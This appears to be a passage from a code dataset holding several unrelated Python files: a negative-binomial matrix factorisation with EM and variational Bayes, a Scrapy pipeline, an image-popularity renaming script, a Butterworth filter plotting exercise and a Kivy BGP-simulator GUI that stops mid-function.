eps=1e-6, random_state=random_state)\n\t\tF = Ft.T\n\n\tL = np.clip(L, a_min = e, a_max = None)\n\tF = np.clip(F, a_min = e, a_max = None)\n\t## iterate\n\tif verbose:\n\t\tprint(\"\tniter\t\tcost \t\trel_cost\\n\")\n\n\tmycosts = []\n\tfor iter in range(maxiter):\n\t\t# if verbose and iter % eval_every == 0:\n\t\t# \tmycost = cost_full(X,L.dot(F.T),a)\n\t\t# \tprint(\"iter {:4d}\t{:.3f}\t{:.3f}\".format(iter, mycost, a))\n\t\t# \tloss.append(mycost)\n\t\t## assess convergence\n\t\tif iter % eval_every == 0:\n\t\t\tmycost = cost_full(X,L.dot(F.T), a)\n\t\t\tmycosts.append(mycost)\n\t\t\trel_cost = (mycosts[-2] - mycost)/abs(mycosts[-2]) if iter > 0 else 10000\n\t\t\tif verbose:\n\t\t\t\tprint(\"iter {:4d}\\t{:.3f}\\t{:.6f}\t\".format(iter, mycost, rel_cost))\n\t\t\tif rel_cost < tol:\n\t\t\t\tprint(\"rel_cost {} meet tolerance {} after {} iteration\".format(rel_cost, tol, iter))\n\t\t\t\tbreak\n\n\t\tL,F, a = _update_em_full(X,L,F, a, fix)\n\n\tif return_loss:\n\t\treturn L,F, a, mycosts\n\n\treturn L,F, a\n\ndef _update_em_full(X,L,F,a, fix):\n\tfix_l, fix_f, fix_a = fix\n\n\te = sys.float_info.min \n\t## update a\n\tif not fix_a:\n\t\tLFt = L @ F.T\n\t\tstart = time.time()\n\t\t# res = minimize(_obj_a, 1, method='nelder-mead',args = (X,LFt, a),\n\t # options={'xtol': 1e-5, 'disp': False, 'maxiter':10})\n\n\t\tI,J = X.shape\n\t\tC1 = np.sum(psi(X + a.reshape(1,-1)) - log(LFt + a.reshape(1,-1)), axis = 0)\n\t\tC2 = np.sum((X+a.reshape(1,-1))/(LFt + a.reshape(1,-1)), axis = 0)\n\t\tparams = [I,J,C1,C2]\n\n\t\tres = minimize(_obj_a, a, method='nelder-mead',args = (params),\n\t\t options={'xtol': 1e-5, 'disp': False, 'maxiter':50})\n\t\t# res = minimize(_obj_a, 1, method='Newton-CG', jac=_obj_a_der,args = (params),\n\t\t# \t\t\t options={'xtol': 1e-5, 'disp': False, 'maxiter':10})\n\t\truntime = time.time() - start\n\t\ta = res.x\n\t## update L\n\tif not fix_l:\n\t\t#LFt = L @ F.T\n\t\tM1 = (X/LFt) @ F\n\t\tM2 = ((X + a.reshape(1,-1))/(LFt + a.reshape(1,-1))) @ F\n\t\tL = L * (M1/M2)\n\t\tL = np.clip(L, a_min = e, a_max = None)\n\t## update F\n\tif not fix_f:\n\t\tLFt = L @ F.T\n\t\tN1 = (X / LFt).T @ L\n\t\tN2 = ((X + a.reshape(1,-1))/(LFt + a.reshape(1,-1))).T @ L \n\t\tF = F * (N1/N2)\n\t\tF = np.clip(F, a_min = e, a_max = None) \n\treturn L,F, a\n\n## C1 = np.sum(psi(X + a0) - log(Lam + a0))\n## C2 = np.sum((X+a0)/(Lam + a0))\n\n## scipy.optimize needs to evaluate objective function every time, so evaluating same computation many times!\ndef _obj_a(a, params):\n\tI,J,C1,C2 = params\n\n\t#I, J = X.shape \n\t# Xa_d_Lama = (X + a)/(Lam + a)\n\t# obj = I*J*(a*log(a) - gamma(a)) + np.sum((a-1)*(psi(X + a) - log(Lam + a)) - a * Xa_d_Lama + Xa_d_Lama * Lam)\n\t# obj = I*J*(a*log(a) - gammaln(a)) + np.sum((a-1)*(psi(X + a0) - log(Lam + a0)) - a*(X+a0)/(Lam + a0))\n\t#obj = (I*(a*log(a) - gammaln(a)) + ((a-1)*C1 - a*C2).sum()).sum()\n\n\tobj = I * (a*log(a) - gammaln(a)).sum()\n\tobj += ((a-1)*C1 - a*C2).sum()\n\treturn -obj\n\ndef _obj_a_der(a, params):\n\t# I, J = X.shape \n\t# der = I*J*(log(a) + 1 - psi(a)) + np.sum(psi(X + a0) - log(Lam + a0) - (X+a0)/(Lam + a0))\n\tI,J,C1,C2 = params\n\tder = I*(log(a) + 1 - psi(a)).sum() + C1.sum() - C2.sum()\n\treturn -der\n\n\n\n### --------------------------------------------------\n### gibbs algorithm\n### TO DO\n### --------------------------------------------------\n\ndef gibbs(X, L,F, a ,maxiter = 100, verbose = True, eval_every = 10):\n\treturn None\n\n### --------------------------------------------------\n##### Variational Bayes algorithm\n\n### l_ik ~ Gamma(al, bl)\n### f_jk ~ Gamma(af, bf)\n\n#### Composite model:\n### U_ij ~ Gamma(a,a)\n### Z_ijk ~ Pois(U_ij l_ik f_jk)\n### X_ij = sum_k Z_ijk\n\n#### optimize using CAVI\n### q(Z_ijK) = MN(X_ij, Zeta_ijK)\n### q(U_ij) = Gamma(au_ij, bu_ij)\n### q(l_ik) = Gamma(al_ik, bl_ik)\n### q(f_jk) = Gamma(af_jk, bf_jk)\n\n#### update\n### Zeta_ijk \\propto exp( + )\n### au_ij = a + X_ij; bu_ij = a + sum_k \n### al_ik = al + sum_j X_ij Zeta_ijk; bl_ik = bl + sum_j \n### af_jk = af + sum_i X_ij Zeta_ijk; bf_jk = bf + sum_i \n\n#### expectations w.r.t\n### for x ~ Gamma(a,b)\n### = a/b; = psi(a) - log(b)\n### --------------------------------------------------\n\ndef VB(X,k, a ,prior, maxiter = 100, verbose = True, eval_every = 10):\t\n\tal,bl,af,bf = prior\n\n\tn,p = X.shape\n\n\t## initialize variational parameters\n\tAl = np.exp(np.random.uniform(size = (n,k)))\n\tBl = np.exp(np.random.uniform(size = (n,k)))\n\tAf = np.exp(np.random.uniform(size = (p,k)))\n\tBf = np.exp(np.random.uniform(size = (p,k)))\n\tAu = np.exp(np.random.uniform(size = (n,p)))\n\tBu = np.exp(np.random.uniform(size = (n,p)))\n\tZeta = np.random.uniform(size = (n,p,k))\n\tZeta = softmax(Zeta, axis = 2)\n\n\tif verbose:\n\t\tprint(\"\tniter\t\tcost\\n\")\n\n\tfor iter in range(maxiter):\n\n\t\tif verbose and iter % eval_every == 0:\n\t\t\tL = E_gamma(Al, Bl)\n\t\t\tF = E_gamma(Af, Bf)\n\t\t\tmycost = cost(X,L.dot(F.T),a)\n\t\t\tprint(\"iter {:4d}\t{:.3f}\".format(iter, mycost))\n\n\t\t## update Zeta\n\t\t## takes O(IJK); main operation do softmax over IJ vectors of length K; how is psi function evaluated?\n\t\tE_logL = E_log_gamma(Al, Bl)\n\t\tE_logF = E_log_gamma(Af, Bf)\n\t\tZeta = np.expand_dims(E_logL, axis = 1) + np.expand_dims(E_logF, axis = 0)\n\t\tZeta = softmax(Zeta, axis = 2)\n\n\t\t## update Au, Bu\n\t\t## takes O(IJK)\n\t\tE_L = E_gamma(Al,Bl)\n\t\tE_F = E_gamma(Af,Bf)\n\t\tAu = a + X ## THIS IS FIXED\n\t\tBu = a + np.einsum('ik,jk -> ij', E_L, E_F)\n\n\t\t## update Al, Bl\n\t\t## takes O(IJK)\n\t\tE_U = E_gamma(Au,Bu)\n\t\t#E_F = E_gamma(Af, Bf)\n\t\tAl = al + np.einsum('ij,ijk -> ik', X, Zeta)\n\t\tBl = bl + np.einsum('ij,jk -> ik', E_U, E_F)\n\n\t\t## update Af, Bf\n\t\t## takes O(IJK)\n\t\tE_L = E_gamma(Al,Bl)\n\t\tAf = af + np.einsum('ij,ijk -> jk', X, Zeta)\n\t\tBf = bf + np.einsum('ij,ik -> jk', E_U, E_L)\n\n\tL = E_gamma(Al, Bl)\n\tF = E_gamma(Af, Bf)\n\n\treturn L,F\n\ndef E_log_gamma(A, B):\n\treturn psi(A) - np.log(B)\n\ndef E_gamma(A,B):\n\treturn A/B\n\n## runtime result for VB\n# n = 500\n# p = 1000\n# K = 3\n# Zeta : 0.055\n# ABl : 0.011\n# ABf : 0.008\n# ABu : 0.004\n# VB fitted with 15.72 seconds\n\n\n### ----------------------------------------\n### testing \n### ----------------------------------------\n\ndef VB_test(X,k, a ,prior, maxiter = 100, verbose = True, eval_every = 10):\t\n\tal,bl,af,bf = prior\n\n\tn,p = X.shape\n\n\t## initialize variational parameters\n\tAl = np.exp(np.random.uniform(size = (n,k)))\n\tBl = np.exp(np.random.uniform(size = (n,k)))\n\tAf = np.exp(np.random.uniform(size = (p,k)))\n\tBf = np.exp(np.random.uniform(size = (p,k)))\n\tAu = np.exp(np.random.uniform(size = (n,p)))\n\tBu = np.exp(np.random.uniform(size = (n,p)))\n\tZeta = np.random.uniform(size = (n,p,k))\n\tZeta = softmax(Zeta, axis = 2)\n\n\ttime_ABl = []\n\ttime_ABf = []\n\ttime_ABu = []\n\ttime_Zeta = []\n\n\tif verbose:\n\t\tprint(\"\tniter\t\tcost\\n\")\n\n\tfor iter in range(maxiter):\n\n\t\tif verbose and iter % eval_every == 0:\n\t\t\tL = E_gamma(Al, Bl)\n\t\t\tF = E_gamma(Af, Bf)\n\t\t\tmycost = cost(X,L.dot(F.T),a)\n\t\t\tprint(\"iter {:4d}\t{:.3f}\".format(iter, mycost))\n\n\t\t## update Zeta\n\t\tstart = time.time()\n\t\tE_logL = E_log_gamma(Al, Bl)\n\t\tE_logF = E_log_gamma(Af, Bf)\n\t\tZeta = np.expand_dims(E_logL, axis = 1) + np.expand_dims(E_logF, axis = 0)\n\t\tZeta = softmax(Zeta, axis = 2)\n\t\ttime_Zeta.append(time.time() - start)\n\n\t\t## update Au, Bu\n\t\tstart = time.time()\n\t\tE_L = E_gamma(Al,Bl)\n\t\tE_F = E_gamma(Af,Bf)\n\t\tAu = a + X ## THIS IS FIXED\n\t\tBu = a + np.einsum('ik,jk -> ij', E_L, E_F)\n\t\ttime_ABu.append(time.time() - start)\n\n\t\t## update Al, Bl\n\t\tstart = time.time()\n\t\tE_U = E_gamma(Au,Bu)\n\t\t#E_F = E_gamma(Af, Bf)\n\t\tAl = al + np.einsum('ij,ijk -> ik', X, Zeta)\n\t\tBl = bl + np.einsum('ij,jk -> ik', E_U, E_F)\n\t\ttime_ABl.append(time.time() - start)\n\n\t\t## update Af, Bf\n\t\tstart = time.time()\n\t\tE_L = E_gamma(Al,Bl)\n\t\tAf = af + np.einsum('ij,ijk -> jk', X, Zeta)\n\t\tBf = bf + np.einsum('ij,ik -> jk', E_U, E_L)\n\t\ttime_ABf.append(time.time() - start)\n\n\tprint(\"time : \\n\")\n\tprint(\"Zeta : {:.3f}\".format(np.mean(time_Zeta)))\n\tprint(\"ABl : {:.3f}\".format(np.mean(time_ABl)))\n\tprint(\"ABf : {:.3f}\".format(np.mean(time_ABf)))\n\tprint(\"ABu : {:.3f}\".format(np.mean(time_ABu)))\n\n\tL = E_gamma(Al, Bl)\n\tF = E_gamma(Af, Bf)\n\n\treturn L,F\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"code/NB_NMF2.py","file_name":"NB_NMF2.py","file_ext":"py","file_size_in_byte":10270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"54826429","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nclass CoastProductPipeline(object):\n def process_item(self, item, spider):\n\n if item['skus']:\n item['skus'] = [i.strip() for i in item['skus'][0].split(\",\")]\n else:\n item['skus'] = None\n\n if item['fabric']:\n item['fabric'] = item['fabric'][0].replace(\"Fabric:\",\"\")\n else:\n item['fabric'] = 'N/A'\n\n for i in item.keys():\n if isinstance(item[i], list) and len(item[i]) <=1:\n item[i] = item[i][0]\n\n return item\n","sub_path":"coastdemo/coastdemo/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"357639897","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport torch\nimport torchvision.models\nimport torchvision.transforms as transforms\nimport glob\nimport os\nfrom PIL import Image\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef prepare_image(image):\n if image.mode != 'RGB':\n image = image.convert(\"RGB\")\n Transform = transforms.Compose([\n transforms.Resize([224,224]), \n transforms.ToTensor(),\n ])\n image = Transform(image) \n image = image.unsqueeze(0)\n return image.to(device)\n\ndef predict(image, model):\n image = prepare_image(image)\n with torch.no_grad():\n preds = model(image)\n # print(r'Popularity score: %.2f' % preds.item() * 100)\n return '%.0f' % (preds.item() * 100)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--image_path', type=str, default='images/')\n config = parser.parse_args()\n image_paths = sorted(glob.glob(os.path.join(config.image_path, '*')))\n model = torchvision.models.resnet50()\n # model.avgpool = nn.AdaptiveAvgPool2d(1) # for any size of the input\n model.fc = torch.nn.Linear(in_features=2048, out_features=1)\n model.load_state_dict(torch.load('/content/Intrinsic-Image-Popularity/model/model-resnet50.pth', map_location=device)) \n model.eval().to(device)\n\n if not os.path.isdir(config.image_path):\n print(\"ERROR: '\" + config.image_path + \"' is not a directory!\")\n return\n\n count = 0\n max_count = 0\n\n image_names = []\n\n for image_path in image_paths:\n file_name, file_extension = os.path.splitext(os.path.split(image_path)[1])\n if (file_extension in ['.png'] and '_' not in file_name):\n max_count += 1\n image_names.append(file_name + file_extension)\n \n if len(image_names) == 0:\n print(\"ERROR: '\" + config.image_path + \"' does not contain any images to rename!\")\n return\n \n print(\"Start renaming of \" + str(len(image_names)) + \" image(s)...\")\n\n for image_name in image_names:\n count += 1\n\n full_path = os.path.join(config.image_path, image_name)\n\n image = Image.open(full_path)\n score = predict(image, model)\n\n os.rename(full_path, os.path.join(config.image_path, str(score) + '_' + image_name))\n \n print(str(count) + '/' + str(max_count))\n\nif __name__ == '__main__':\n main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"537634576","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nMiguel Mares\r\nEce 450 \r\nExam IV\r\nPart A\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom scipy import signal as sig\r\nfrom math import pi, exp, cos, sin, log, sqrt\r\nfrom control import margin\r\nfrom control import tf\r\nfrom cmath import exp\r\nimport numpy as np \r\nfrom math import log10\r\n\r\n########### Calculating n ##########################\r\nwp = .5\r\nHp2 = .707\r\n\r\nn = log10( 1/Hp2 - 1)/(2*log10(wp) )\r\nprint('np = ',n)\r\n\r\n\r\n\r\nws = 2\r\nHs2 = .0178\r\n\r\nns = log10( 1/Hs2 - 1)/(2*log10(ws) )\r\nprint('ns = ',ns)\r\n\r\n####################Plotting Butterworth Filter#########################\r\n\r\nnum = [1]\r\nd1 = [1,1]\r\nd2 = [1,1,1]\r\nden = np.convolve(d1,d2)\r\n\r\nsystem = sig.lti(num,den)\r\nw, Hmag, Hphase = sig.bode(system)\r\n\r\nAmpl = 10**(0.05*Hmag)\r\n#plt.subplot(211)\r\nplt.semilogx(w,Ampl,'k') # Plot amplitude, not dB.\r\nplt.title('3rd Oder Butterworth')\r\nplt.yticks([0,.707,.0178,1])\r\nplt.grid(which='both')\r\nplt.xlabel('$\\omega$ (rad/s)')\r\nplt.ylabel('|H|')\r\nplt.xticks([.5,1,2])\r\nplt.show()\r\n\r\n#plt.subplot(212)\r\nplt.semilogx(w,Hphase,'k') # Plot amplitude, not dB.\r\n#plt.title('Angle Bode')\r\nplt.grid(which='both')\r\nplt.xlabel('$\\omega$ (rad/s)')\r\nplt.ylabel('/_ |H|')\r\nplt.yticks([0,-90,-180,-270])\r\n#plt.xticks([100000,200000,50000])\r\nplt.show()\r\n\r\nnum = [1e15]\r\nden = [1,2*1e5,2*1e10,1e15]\r\n\r\nsystem = sig.lti(num,den)\r\nw, Hmag, Hphase = sig.bode(system)\r\n\r\nAmpl = 10**(0.05*Hmag)\r\nplt.semilogx(w,Ampl,'k') # Plot amplitude, not dB.\r\nplt.title('Scaled 3rd Order Butterworth')\r\nplt.yticks([0,.707,.0178, 1])\r\nplt.grid(which='both')\r\nplt.xlabel('$\\omega$ (rad/s)')\r\nplt.ylabel('|H|')\r\nplt.xticks([100000,200000,50000])\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n##############Calculating and Plotting Z Bode############################\r\n\r\nNN = 5000\r\nphi = np.linspace(0,2*pi,NN)\r\nz = np.zeros(NN, dtype = np.complex)\r\nH = np.zeros(NN, dtype = np.complex)\r\n\r\nT=.2\r\nA = np.deg2rad(sqrt(.75)*T)\r\nb = 1 \r\nH1 = ((b/(b-exp(-T))) + (((.577)*exp(-.5*T)*sin(A)*b) - (b**2) + (exp(-.5*T)*cos(A)*b)) / ((b**2) - (2*exp(-.5*T)*cos(A)*b) + exp(-T)))\r\nprint(\"H1 = \",H1)\r\nfor n in range(0,NN):\r\n z = exp(1j*phi[n])\r\n H[n] = ((z/(z-exp(-T))) + (((.577)*exp(-.5*T)*sin(A)*z) - (z**2) + (exp(-.5*T)*cos(A)*z)) / ((z**2) - (2*exp(-.5*T)*cos(A)*z) + exp(-T)))/H1\r\n \r\n\r\nphi1 = np.rad2deg(wp*T)\r\nphi2 = np.rad2deg(ws*T)\r\nprint('phi_pass = ',phi1,'\\n','phi_stop = ',phi2)\r\n \r\nplt.subplot(211)\r\n#plt.plot((180/pi)*phi,abs(H),'k')\r\nplt.semilogx((180/pi)*phi,20*np.log10(H),'k')\r\nplt.axis([1,100, -60, 10])\r\nplt.ylabel('|G| dB')\r\nplt.yticks([ -35,-3,0])\r\nplt.axvline(phi1,color='k')\r\nplt.axvline(phi2,color='k')\r\nplt.text(2,-10,'$\\phi1$ = {}'.format(round(phi1,2)),fontsize=12)\r\nplt.text(8,-30,'$\\phi2$ = {}'.format(round(phi2,2)),fontsize=12)\r\nplt.title('zbode')\r\nplt.grid(which='both')\r\n\r\naaa = np.angle(H)\r\n#for n in range(NN):\r\n# if aaa[n] > 0:\r\n# aaa[n] = aaa[n] - 2*pi\r\n\r\nplt.subplot(212)\r\n#plt.plot((180/pi)*phi,(180/pi)*aaa,'k')\r\nplt.semilogx((180/pi)*phi,(180/pi)*aaa,'k')\r\nplt.ylabel('/G (degrees)')\r\nplt.axis([1,100, -180,0])\r\nplt.yticks([-90,-45,-180,0])\r\nplt.axvline(5.7,color='k')\r\nplt.axvline(phi2,color='k')\r\nplt.text(2,-90,'$\\phi1$ = {}'.format(round(phi1,2)),fontsize=12)\r\nplt.text(30,-140,'$\\phi2$ = {}'.format(round(phi2,2)),fontsize=12)\r\nplt.grid(which='both')\r\nplt.xlabel('$\\phi$ (degrees)')\r\nplt.savefig('H_zbode.png',dpi=300)\r\nplt.show()\r\n\r\n\r\n","sub_path":"450exam4parta.py","file_name":"450exam4parta.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"27295085","text":"from kivy.app import App\nfrom kivy.graphics import Rectangle \nfrom kivy.graphics import Color\nfrom kivy.graphics import Line \nfrom kivy.lang import Builder\nfrom kivy.properties import ListProperty, StringProperty, ObjectProperty, NumericProperty, DictProperty\nfrom kivy.uix.button import Button \nfrom kivy.uix.label import Label \nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.uix.widget import Widget\nfrom simulator import BGPSimulator, Node\n\nimport math\n\n#Define our different screens\nclass WelcomeScreen(Screen):\n pass\n\n# fixed node is just a node that doesn't move - used for simulator screen\nclass FixedNode(Widget):\n node_name = StringProperty()\n plinks = ListProperty()\n pclinks = ListProperty()\n\nclass NodeG(Widget):\n node_name = StringProperty()\n #links = ListProperty()\n plinks = ListProperty()\n pclinks = ListProperty()\n\n # if mouse touch down is on me, claim the touch - so it won't affect any other nodes that the touch down might also be touching\n def on_touch_down(self, touch):\n if self.collide_point(*touch.pos):\n touch.grab(self)\n return True\n\n # if touch_move, check if you own the touch, if you do, move the node with the touch_move\n def on_touch_move(self, touch):\n if self.collide_point(*touch.pos):\n if touch.grab_current is self:\n self.center = touch.pos\n for link in self.plinks:\n link.points[0] = link.nodes[0].center_x\n link.points[1] = link.nodes[0].center_y\n link.points[2] = link.nodes[1].center_x\n link.points[3] = link.nodes[1]. center_y\n for link in self.pclinks:\n link.points[0] = link.nodes[0].center_x\n link.points[1] = link.nodes[0].center_y\n link.points[2] = link.nodes[1].center_x\n link.points[3] = link.nodes[1]. center_y\n link.custIndicator.update_pos(link)\n return True\n\n # on touch_up unclaim the touch\n def on_touch_up(self, touch):\n if touch.grab_current is self:\n touch.ungrab(self)\n return True\n\n\nclass PeerLink(Widget):\n points = ListProperty()\n nodes = ListProperty()\n\n# Widget for dot that indicates customer in p-c link\nclass CustIndicator(Widget):\n # update the position of the dot to match where the arrow line is as best as possible\n def update_pos(self, link):\n if link.nodes[1].center_x != link.nodes[0].center_x:\n m = (float) (link.nodes[1].center_y - link.nodes[0].center_y) / (float) (link.nodes[1].center_x - link.nodes[0].center_x)\n if (link.nodes[1].center_y - link.nodes[0].center_y) < 0:\n # then customer is below provider\n if (link.nodes[1].center_x - link.nodes[0].center_x) < 0:\n # then customer is left of provider\n x = link.nodes[1].center_x + (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y + (m * 25.0 * math.sqrt(1/(1+(m*m))))\n elif (link.nodes[1].center_x - link.nodes[0].center_x) > 0:\n # then customer is right of provider\n x = link.nodes[1].center_x - (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y - (m * 25.0 * math.sqrt(1/(1+(m*m))))\n elif (link.nodes[1].center_y - link.nodes[0].center_y) > 0:\n # then customer is above provider\n if (link.nodes[1].center_x - link.nodes[0].center_x) < 0:\n # then customer is left of provider\n x = link.nodes[1].center_x + (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y + (m * 25.0 * math.sqrt(1/(1+(m*m))))\n elif (link.nodes[1].center_x - link.nodes[0].center_x) > 0:\n # then customer is right of provider\n x = link.nodes[1].center_x - (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y - (m * 25.0 * math.sqrt(1/(1+(m*m))))\n elif (link.nodes[1].center_y - link.nodes[0].center_y) == 0:\n # then customer is at same height as provider\n if (link.nodes[1].center_x - link.nodes[0].center_x) < 0:\n # then customer is left of provider\n x = link.nodes[1].center_x + (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y - (m * 25.0 * math.sqrt(1/(1+(m*m))))\n elif (link.nodes[1].center_x - link.nodes[0].center_x) > 0:\n # then customer is right of provider\n x = link.nodes[1].center_x - (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y - (m * 25.0 * math.sqrt(1/(1+(m*m))))\n else:\n if (link.nodes[1].center_y - link.nodes[0].center_y) < 0:\n # then customer is below provider\n y = link.nodes[1].center_y + 25.0\n x = link.nodes[1].center_x\n elif (link.nodes[1].center_y - link.nodes[0].center_y) > 0:\n # then customer is above provider\n y = link.nodes[1].center_y - 25.0\n x = link.nodes[1].center_x\n self.pos = (x,y)\n\nclass PCLink(Widget):\n points = ListProperty()\n cust_pos = ObjectProperty(None)\n nodes = ListProperty()\n custIndicator = ObjectProperty(None)\n\nclass NetworkCanvas(Widget):\n node_count = NumericProperty(0)\n # dictionary of all nodes on canvas\n node_widgets = DictProperty()\n # list of all canvas links\n plinks = ListProperty()\n pclinks = ListProperty()\n\n def add_node(self, nodeName):\n # id = nodeName + \"__\" + str(self.node_count)\n err, ok = sim.add_node(nodeName)\n if not ok:\n print(err)\n return\n\n temp_node = NodeG()\n temp_node.center = self.center\n # temp_node.node_id = id\n temp_node.node_name = nodeName\n \n self.add_widget(temp_node)\n self.node_widgets[nodeName] = temp_node\n self.node_count = self.node_count + 1\n\n def add_fixed_node(self, node):\n temp_node = FixedNode()\n temp_node.center = node.center \n temp_node.node_name = node.node_name\n\n self.node_widgets[temp_node.node_name] = temp_node\n self.node_count = self.node_count + 1\n self.add_widget(temp_node)\n\n def delete_node(self, nodeName):\n # delete node from underlying simulator\n err, ok = sim.delete_node(nodeName)\n if not ok:\n print(err)\n return\n\n # delete any links connected to the node \n # remove link from other node's link list and from canvas\n for link in self.node_widgets[nodeName].plinks:\n self.remove_widget(link)\n self.plinks.remove(link)\n for node in link.nodes:\n if node.node_name != nodeName:\n node.plinks.remove(link)\n\n for link in self.node_widgets[nodeName].pclinks:\n self.remove_widget(link)\n self.pclinks.remove(link)\n for node in link.nodes:\n if node.node_name != nodeName:\n node.pclinks.remove(link)\n\n # delete node from canvas\n self.remove_widget(self.node_widgets[nodeName])\n\n # delete node from simulator GUI \n self.node_widgets.pop(nodeName)\n self.node_count = self.node_count - 1\n\n def add_peer_link(self, p1, p2, mod_sim=True, color=Color(204/255,204/255,204/255)):\n if (mod_sim):\n err, ok = sim.add_peer_link(p1, p2)\n if not ok:\n print(err)\n return\n\n temp_peer_link = PeerLink()\n\n temp_peer_link.canvas.before.add(color)\n\n # add the node link to each peer's link list\n self.node_widgets[p1].plinks.append(temp_peer_link)\n self.node_widgets[p2].plinks.append(temp_peer_link)\n\n # add peer nodes to the link's node list\n temp_peer_link.nodes.append(self.node_widgets[p1])\n temp_peer_link.nodes.append(self.node_widgets[p2])\n\n temp_peer_link.points.append(self.node_widgets[p1].center_x)\n temp_peer_link.points.append(self.node_widgets[p1].center_y)\n temp_peer_link.points.append(self.node_widgets[p2].center_x)\n temp_peer_link.points.append(self.node_widgets[p2].center_y)\n\n self.plinks.append(temp_peer_link)\n self.add_widget(temp_peer_link)\n return temp_peer_link\n\n def add_pc_link(self, p, c, mod_sim=True, color=Color(150/255,150/255,150/255)):\n if (mod_sim):\n err, ok = sim.add_pc_link(p,c)\n if not ok:\n print(err)\n return\n\n temp_pc_link = PCLink()\n temp_pc_link.canvas.before.add(color)\n\n\n # add the node link to each node's link list\n self.node_widgets[p].pclinks.append(temp_pc_link)\n self.node_widgets[c].pclinks.append(temp_pc_link)\n\n # add provider and customer nodes to the link's node list\n temp_pc_link.nodes.append(self.node_widgets[p])\n temp_pc_link.nodes.append(self.node_widgets[c])\n\n #c = self.node_widgets[c].pos\n\n # with temp_pc_link.canvas.after:\n # Color(rgb=(0,0,1))\n # Line(ellipse=(pos=(self.node_widgets[c].pos), size=(10,10)))\n\n temp_pc_link.custIndicator.update_pos(temp_pc_link)\n\n temp_pc_link.points.append(self.node_widgets[c].center_x)\n temp_pc_link.points.append(self.node_widgets[c].center_y)\n\n temp_pc_link.points.append(self.node_widgets[p].center_x)\n temp_pc_link.points.append(self.node_widgets[p].center_y)\n\n self.pclinks.append(temp_pc_link)\n self.add_widget(temp_pc_link)\n return temp_pc_link\n\n def clear(self):\n for key in self.node_widgets:\n # clear all nodes and links from the network canvas \n for link in self.node_widgets[key].plinks:\n self.remove_widget(link)\n for link in self.node_widgets[key].pclinks:\n self.remove_widget(link)\n self.remove_widget(self.node_widgets[key])\n\n\n # remove all nodes from the network canvas's node dictionary\n self.node_widgets.clear()\n\n # remove all the links from the network canvas's link lists\n self.pclinks.clear()\n self.plinks.clear()\n self.node_count = 0\n\n\nclass SetupScreen(Screen):\n network_canvas = ObjectProperty(None)\n peerlink = ObjectProperty(None)\n pclink = ObjectProperty(None)\n node_name = ObjectProperty(None)\n delete_node_name = ObjectProperty(None)\n\n def add_nodes(self, nodes):\n node_list = nodes.strip()\n node_list = node_list.split()\n for node in node_list:\n self.network_canvas.add_node(node)\n\n def delete_nodes(self, nodes):\n node_list = nodes.strip()\n node_list = node_list.split()\n for node in node_list:\n self.network_canvas.delete_node(node)\n\n # parse link info input\n def add_peer_relationship(self):\n rel = self.peerlink.text\n rel = rel.strip()\n rel = rel.split()\n if len(rel) != 3:\n print(\"Incorrect peer relationship format\")\n return\n p1 = rel[0]\n p2 = rel[2]\n self.network_canvas.add_peer_link(p1,p2)\n \n # parse link info input\n def add_pc_relationship(self):\n rel = self.pclink.text\n rel = rel.strip()\n rel = rel.split()\n if len(rel) != 3:\n print(\"Incorrect pc relationship format\")\n return\n p = rel[0]\n c = rel[2]\n self.network_canvas.add_pc_link(p,c)\n\n def reset_text_inputs(self):\n self.pclink.text = \"p -> c\"\n self.peerlink.text = \"p = p\"\n self.node_name.text = \"\"\n self.delete_node_name.text = \"\"\n\n\n def populate_sim_screen(self):\n # self.parent.sim_screen.network_canvas = self.network_canvas <--- this does not work unfortunately\n for key in self.network_canvas.node_widgets:\n self.parent.sim_screen.final_network_canvas.add_fixed_node(self.network_canvas.node_widgets[key])\n\n for link in self.network_canvas.plinks:\n self.parent.sim_screen.final_network_canvas.add_peer_link(link.nodes[0].node_name, link.nodes[1].node_name, False)\n \n for link in self.network_canvas.pclinks:\n self.parent.sim_screen.final_network_canvas.add_pc_link(link.nodes[0].node_name, link.nodes[1].node_name, False)\n\n\nclass SimulationScreen(Screen):\n dest_node = ObjectProperty(None)\n results = ObjectProperty(None)\n final_network_canvas = ObjectProperty(None)\n final_route_links = ListProperty()\n\n # To show the results, instead of changing the color of chosen paths, I just draw over them in black\n def simulate(self):\n self.results.text = \"\"\n for link in self.final_route_links:\n self.final_network_canvas.remove_widget(link)\n self.final_route_links.clear()\n dest = self.dest_node.text.strip()\n err, ok = sim.simulate(dest)\n if not ok:\n self.results.text = err\n return\n self.results.text = str(sim)\n for node in sim.nodes:\n # node is node_name\n if sim.nodes[node].finalRoute is not None:\n if len(sim.nodes[node].finalRoute.path) == 1:\n continue\n node2 = sim.nodes[node].finalRoute.path[1]\n if sim.nodes[node].finalRoute.path[1] in sim.nodes[node].providers:\n 